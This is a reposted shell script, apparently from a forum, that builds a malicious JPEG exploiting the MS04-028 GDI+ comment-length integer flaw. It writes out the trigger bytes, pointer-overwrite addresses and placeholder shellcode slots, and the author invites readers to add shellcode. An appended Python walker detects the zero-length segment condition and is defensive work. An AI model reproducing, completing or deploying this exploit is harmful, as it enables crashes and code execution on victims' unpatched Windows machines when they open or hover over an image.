ms04028.sh JPEG vuln

Source: free web

Code:
#!/bin/sh
# Note: the \x escapes below need a shell whose printf supports them
# (bash's builtin does; a strictly POSIX sh need not)
#
# The JPEG vuln is triggered by the 0 or 1 length field with an integer flaw
# The crafted JPEG header makes Windows crash a couple of different ways
# 1) First, it crashes when the image is opened.
# 2) Second, it crashes when hovering the mouse over the image.
#
# The pointer overwrite is pretty straight forward in a debugger
#
# Usage:
# sh ms04-028.sh > clickme.jpg
#
# Note: This isn't a ./hack
# - Plug in shellcode and get the address
# - You non-kiddies out there are smart enough to fill in the blanks
# - Until you do the above, it's just a stupid PoC crash
#
# It's ugly, but it works :)
#
# -perplexy-

#JPEG header 'n stuff
printf "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46"
printf "\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"

#Trigger string - 00 length field (01 works too)
printf "\xFF\xFE\x00\x00"

printf "\x45\x78\x69\x66\x00\x00\x49\x49\x2A\x00\x08\x00"

# 1) Opening directly in IE
#Address to overwrite = RtlEnterCriticalSection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F"

# 1) Opening directly in IE
#Address of shellcode
printf "\x41\x41\x41\x41"

#Other stuff
printf "\x96\x02\x00\x00\x1A\x00\x00\x00"

# 2) MouseOver in IE
#Address to overwrite = RtlEnterCriticalSection() - 4
#Check page 172 of SC Handbook for those of you playing along at home
printf "\x1C\xF0\xFD\x7F";

# 2) MouseOver in IE
#Address of shellcode
printf "\x41\x41\x41\x41"

#Comments here
perl -e 'print "A"x1000';

#Image junk here
printf "\x00\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07";
printf "\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14";
printf "\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24\x2E\x27\x20\x22\x2C\x23\x1C";
printf "\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C";
printf "\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D";
printf "\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32";
printf "\x32\x32\x32\x32\x32\xFF\xC0\x00\x11\x08\x00\x03\x00\x03\x03\x01\x22";
printf "\x00\x02\x11\x01\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01";
printf "\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05";
printf "\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03\x02";
printf "\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00\x04\x11\x05";
printf "\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1\x08";
printf "\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17";
printf "\x18\x19\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43";
printf "\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64";
printf "\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85";
printf "\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4";
printf "\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3";
printf "\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1";
printf "\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8";
printf "\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01";
printf "\x01\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A";
printf "\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04";
printf "\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41";
printf "\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09\x23";
printf "\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19";
printf "\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47";
printf "\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68";
printf "\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88";
printf "\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7";
printf "\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6";
printf "\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5";
printf "\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00";
printf "\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF9\xFE\x8A\x28\xA0\x0F";
printf "\xFF\xD9";
qq310926 is the only QQ number I use; anyone with a different number claiming to be 邪八冰血封情 is not me.
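Added defensive example, not part of the original post: a marker-segment walker that flags the condition the script's comment describes, a JPEG segment whose 16-bit length field is 0 or 1. The length field counts its own two bytes, so a parser that trusts it computes a payload size of length - 2, which wraps to a huge value when length is below 2. The walker stops at the first such field (it cannot safely continue past it) and also reports truncated or oversized segments. The two sample JPEG byte strings are constructed for this example; only their SOI/APP0/COM marker layout mirrors the header the script emits.

```python
import struct

# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE_MARKERS = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))
SOS_MARKER = 0xDA  # start of scan; entropy-coded data follows

def scan_jpeg_segments(data: bytes):
    """Walk the marker segments of a JPEG and return a list of findings.

    Each finding is (offset, marker, declared_length, problem). An empty
    list means every segment header up to SOS/EOI was well-formed.
    """
    findings = []
    if data[:2] != b"\xFF\xD8":
        findings.append((0, None, None, "missing SOI marker"))
        return findings
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            findings.append((pos, None, None, "expected marker byte 0xFF"))
            break
        marker = data[pos + 1]
        if marker == 0xFF:           # fill byte between markers, skip it
            pos += 1
            continue
        if marker in STANDALONE_MARKERS:
            if marker == 0xD9:       # EOI: done
                break
            pos += 2
            continue
        if pos + 4 > len(data):
            findings.append((pos, marker, None, "truncated length field"))
            break
        # Big-endian 16-bit length that includes its own two bytes.
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        if length < 2:
            findings.append((pos, marker, length,
                             "segment length below 2 (length - 2 underflows)"))
            break
        if pos + 2 + length > len(data):
            findings.append((pos, marker, length, "segment length exceeds file"))
            break
        if marker == SOS_MARKER:     # structural walk ends at the scan data
            break
        pos += 2 + length
    return findings

def is_malformed(data: bytes) -> bool:
    """True when any segment header is unsafe to trust."""
    return bool(scan_jpeg_segments(data))

# Constructed sample inputs (not files from the original post).
_APP0 = b"\xFF\xE0\x00\x10JFIF\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00"
# Benign: COM segment with a valid length (5 = 2 length bytes + "abc").
BENIGN_JPEG = b"\xFF\xD8" + _APP0 + b"\xFF\xFE\x00\x05abc" + b"\xFF\xD9"
# Malformed: COM segment whose length field is 0, as in the script's trigger.
MALFORMED_JPEG = b"\xFF\xD8" + _APP0 + b"\xFF\xFE\x00\x00" + b"Exif\x00\x00" + b"\xFF\xD9"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_JPEG), ("malformed", MALFORMED_JPEG)):
        print(name, scan_jpeg_segments(sample))
```

Run it on a directory of images and any non-empty findings list is worth a closer look; for the malformed sample the walker reports the COM marker at offset 20 with a declared length of 0.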